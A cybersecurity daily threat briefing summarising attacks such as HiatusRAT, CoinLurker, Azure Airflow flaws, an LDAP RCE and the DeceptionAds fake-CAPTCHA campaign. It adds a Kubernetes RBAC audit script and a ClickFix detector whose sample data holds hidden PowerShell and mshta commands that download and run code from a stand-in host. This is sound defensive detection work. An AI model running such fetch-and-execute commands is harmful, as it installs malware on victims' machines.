Cyware Daily Threat Intelligence, December 17, 2024
Daily Threat Briefing • Dec 17, 2024
Cybercriminals are doubling down on exploiting overlooked vulnerabilities, turning common devices and platforms into tools for covert operations. The FBI issued a warning about HiatusRAT attacks that target web cameras and DVRs, especially Chinese-branded devices with weak passwords and known flaws.
Unit 42 researchers uncovered critical vulnerabilities in Azure Data Factory's Apache Airflow integration, exposing cloud infrastructure to potential compromise. Flaws like misconfigured Kubernetes RBAC and mishandled Geneva secrets could allow attackers to exfiltrate data, deploy malware, and gain unauthorized control.
Meanwhile, Guardio Labs identified a malvertising campaign called DeceptionAds, responsible for over one million daily ad impressions. The attackers exploit a single ad network to spread fake CAPTCHA prompts, tricking users into running harmful PowerShell commands.
HiatusRAT targets vulnerable web cameras
The FBI warned about new HiatusRAT attacks targeting vulnerable web cameras and DVRs, particularly focusing on Chinese-branded devices with known vulnerabilities and weak passwords. The attackers use open-source tools to exploit telnet access and target specific TCP ports. Network defenders are advised to limit the use of these devices and report any suspected compromises to the FBI. The malware is used to create covert proxy networks and aligns with Chinese strategic interests.
Hackers abuse WebView2, deploy CoinLurker
Bogus software update alerts are being used by cybercriminals to spread a new malware known as CoinLurker. Attackers employ various strategies to deliver these fake updates, including notifications on compromised WordPress sites, malvertising redirects, phishing emails linking to fraudulent update pages, and links shared through social media. The software update prompts utilize Microsoft Edge WebView2 to execute the malware, making it difficult for security systems to detect. One tactic used is EtherHiding, where compromised sites load scripts to download the malware disguised as legitimate tools from a Bitbucket repository.
New bugs in Azure Data Factory
Unit 42 researchers discovered security vulnerabilities in the Azure Data Factory Apache Airflow integration, allowing attackers to gain unauthorized access and control over the infrastructure. By exploiting these flaws, attackers could perform activities such as data exfiltration, malware deployment, and unauthorized data access. The vulnerabilities included misconfigured Kubernetes RBAC, mishandling of Azure's internal Geneva service secrets, and weak authentication for Geneva.
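The "misconfigured Kubernetes RBAC" in the item above is the kind of finding a defender can check for before an attacker does. The script below is an added example, not Unit 42's tooling and not anything from Azure Data Factory or Airflow: it walks Role/ClusterRole objects and their bindings (constructed here to resemble `kubectl get ... -o json` output) and reports service accounts that end up with wildcard permissions or read access to secrets. The rule set is a generic baseline, not the specific misconfiguration the researchers reported.

```python
"""Audit Kubernetes RBAC bindings for over-privileged service accounts.

Added example; the manifests are constructed and the risk rules are a
generic baseline, not the Airflow-specific finding from the briefing.
"""

# Constructed sample: a cluster-admin ClusterRole plus two namespaced Roles.
SAMPLE_ROLES = [
    {"kind": "ClusterRole", "metadata": {"name": "cluster-admin"},
     "rules": [{"apiGroups": ["*"], "resources": ["*"], "verbs": ["*"]}]},
    {"kind": "Role", "metadata": {"name": "airflow-worker", "namespace": "airflow"},
     "rules": [{"apiGroups": [""], "resources": ["pods", "pods/log"], "verbs": ["get", "list"]},
               {"apiGroups": [""], "resources": ["secrets"], "verbs": ["get", "list"]}]},
    {"kind": "Role", "metadata": {"name": "log-reader", "namespace": "airflow"},
     "rules": [{"apiGroups": [""], "resources": ["pods/log"], "verbs": ["get"]}]},
]

# Constructed sample bindings: the worker service account is bound both to
# cluster-admin (cluster-wide) and to a Role that can read secrets.
SAMPLE_BINDINGS = [
    {"kind": "ClusterRoleBinding", "metadata": {"name": "worker-admin"},
     "roleRef": {"kind": "ClusterRole", "name": "cluster-admin"},
     "subjects": [{"kind": "ServiceAccount", "name": "airflow-worker", "namespace": "airflow"}]},
    {"kind": "RoleBinding", "metadata": {"name": "worker-role", "namespace": "airflow"},
     "roleRef": {"kind": "Role", "name": "airflow-worker"},
     "subjects": [{"kind": "ServiceAccount", "name": "airflow-worker", "namespace": "airflow"}]},
    {"kind": "RoleBinding", "metadata": {"name": "reader", "namespace": "airflow"},
     "roleRef": {"kind": "Role", "name": "log-reader"},
     "subjects": [{"kind": "ServiceAccount", "name": "log-shipper", "namespace": "airflow"}]},
]

# Resources whose read/create access lets a workload escalate or exfiltrate.
SENSITIVE_RESOURCES = {"secrets", "pods/exec", "clusterrolebindings", "rolebindings"}


def rule_findings(rule: dict) -> list[str]:
    """Return the reasons a single RBAC rule counts as risky (empty if none)."""
    resources = set(rule.get("resources", []))
    verbs = set(rule.get("verbs", []))
    findings = []
    if "*" in resources and "*" in verbs:
        findings.append("wildcard resources and verbs (cluster-admin equivalent)")
    elif "*" in verbs:
        findings.append("wildcard verbs on " + ",".join(sorted(resources)))
    hits = resources & SENSITIVE_RESOURCES
    if hits and (verbs & {"get", "list", "watch", "create", "*"}):
        findings.append("access to sensitive resources: " + ",".join(sorted(hits)))
    return findings


def index_roles(roles: list[dict]) -> dict:
    """Key roles by (kind, namespace, name); ClusterRoles have namespace None."""
    return {(r["kind"], r["metadata"].get("namespace"), r["metadata"]["name"]): r for r in roles}


def audit_service_accounts(roles: list[dict], bindings: list[dict]) -> dict[str, list[str]]:
    """Map 'namespace/serviceaccount' to its findings; only ServiceAccount subjects are reported."""
    by_key = index_roles(roles)
    report: dict[str, list[str]] = {}
    for b in bindings:
        ref = b["roleRef"]
        # A RoleBinding may reference a ClusterRole; the role itself then has no namespace.
        ns = None if ref["kind"] == "ClusterRole" else b["metadata"].get("namespace")
        role = by_key.get((ref["kind"], ns, ref["name"]))
        if role is None:
            continue  # dangling roleRef: nothing is granted
        scope = "cluster-wide" if b["kind"] == "ClusterRoleBinding" else f"namespace {b['metadata'].get('namespace')}"
        for subj in b.get("subjects", []):
            if subj.get("kind") != "ServiceAccount":
                continue
            sa = f"{subj.get('namespace')}/{subj['name']}"
            for rule in role.get("rules", []):
                for f in rule_findings(rule):
                    report.setdefault(sa, []).append(f"{scope} via {ref['kind']}/{ref['name']}: {f}")
    return report


if __name__ == "__main__":
    for account, findings in audit_service_accounts(SAMPLE_ROLES, SAMPLE_BINDINGS).items():
        print(account)
        for f in findings:
            print("  -", f)
```

On the constructed input only `airflow/airflow-worker` is reported, once for the cluster-admin binding and once for secrets access; the log-shipper account, which can only read pod logs, is silent. The same walk applies to real output from `kubectl get roles,clusterroles,rolebindings,clusterrolebindings -A -o json` after splitting the item lists by kind.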
Critical Windows LDAP flaw disclosed
Microsoft disclosed a critical RCE vulnerability in its LDAP service, posing a severe risk to enterprise networks. The vulnerability, tracked as CVE-2024-49112, allows unauthenticated attackers to execute arbitrary code within the LDAP service. It affects a wide range of Windows operating systems and server versions, potentially compromising Domain Controllers and other critical network components. Chaining this vulnerability with two others could escalate privileges, granting attackers SYSTEM-level access. While no public exploits have been detected, active exploitation is anticipated.
DeceptionAds - Fake CAPTCHA drives info-stealer infection
Guardio Labs discovered a new type of ClickFix-style attack linked to a campaign called DeceptionAds, which exploits a single ad network to spread malvertising. This campaign is responsible for over one million daily ad impressions and has led to significant losses for thousands of victims through a network of over 3,000 compromised content sites. These attacks target visitors on pirated movie sites, redirecting them to fake CAPTCHA pages that prompt users to run a harmful PowerShell command. Guardio traced the campaign back to the ad platform Monetag, with attackers using BeMob ad-tracking to disguise their actions.
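The fake-CAPTCHA lure ends with the victim running a PowerShell command by hand, which leaves a distinctive process-creation footprint. The detector below is an added example, not Guardio Labs' code: it assumes the usual ClickFix mechanics in which the pasted command is launched from the Windows Run dialog, so the script host appears as a child of explorer.exe, and it scores each event on that parent plus download-and-execute or hidden-window switches in the command line. The log lines are constructed to resemble Sysmon Event ID 1 fields, and the host list goes slightly beyond the briefing's PowerShell case by also covering mshta.exe, which some ClickFix variants use.

```python
"""Flag ClickFix-style script-host launches in constructed process-creation events.

Added example. Assumes the paste-into-Run-dialog pattern (explorer.exe parent);
events are constructed in the shape of Sysmon Event ID 1, not real telemetry.
"""
import re

# Constructed sample events: (parent image, image, command line).
SAMPLE_EVENTS = [
    ("C:\\Windows\\explorer.exe",
     "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     'powershell -w hidden -c "iwr http://example.invalid/verify | iex"'),
    ("C:\\Windows\\explorer.exe",
     "C:\\Windows\\System32\\mshta.exe",
     "mshta http://example.invalid/captcha.hta"),
    ("C:\\Program Files\\ConfigMgr\\ccmexec.exe",
     "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\inventory.ps1"),
    ("C:\\Windows\\explorer.exe",
     "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "powershell.exe"),
]

INTERACTIVE_PARENTS = {"explorer.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}

# Command-line fragments typical of paste-and-run payloads. A switch is only
# matched at the start of a token (after whitespace), since "\b" does not sit
# between a space and a hyphen.
SUSPICIOUS = [
    re.compile(r"(?i)(?:^|\s)-w(?:indowstyle)?\s+hidden\b"),
    re.compile(r"(?i)(?:^|\s)-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}"),
    re.compile(r"(?i)\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring)\b"),
    re.compile(r"(?i)\biex\b|invoke-expression"),
    re.compile(r"(?i)\bmshta(?:\.exe)?\s+https?://"),
]


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(parent: str, image: str, cmdline: str) -> tuple[int, list[str]]:
    """Return (score, reasons); a score of 2 or more is treated as a ClickFix candidate."""
    reasons: list[str] = []
    if basename(image) not in SCRIPT_HOSTS:
        return 0, reasons
    if basename(parent) in INTERACTIVE_PARENTS:
        reasons.append("script host spawned from the desktop shell (Run dialog / paste)")
    for pat in SUSPICIOUS:
        if pat.search(cmdline):
            reasons.append("suspicious fragment: " + pat.pattern)
    return len(reasons), reasons


def find_candidates(events) -> list[tuple[str, list[str]]]:
    """Return (command line, reasons) for every event that reaches the threshold."""
    out = []
    for parent, image, cmd in events:
        score, reasons = score_event(parent, image, cmd)
        if score >= 2:
            out.append((cmd, reasons))
    return out


if __name__ == "__main__":
    for cmd, reasons in find_candidates(SAMPLE_EVENTS):
        print("CANDIDATE:", cmd)
        for r in reasons:
            print("   ", r)
```

Requiring two independent signals keeps a user who simply opens PowerShell from the shell (event 4) and a management agent running a signed inventory script (event 3) out of the results, while the hidden-window download-and-execute one-liner and the remote HTA launch both surface. In production the same scoring would run over real Sysmon or EDR process-creation events rather than the constructed tuples above.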
New investment scam uses AI
A new type of investment scam called Nomani has rapidly grown, targeting victims through fraudulent ads on social media platforms. It grew by over 335% between H1 and H2 2024, with more than 100 new URLs detected daily on average between May and November 2024. The scam involves luring victims to phishing websites and collecting their personal information, before manipulating them into investing in non-existent products. The perpetrators, suspected to be Russian-speaking threat actors, use social engineering techniques to outmaneuver security measures and defraud victims of both money and data.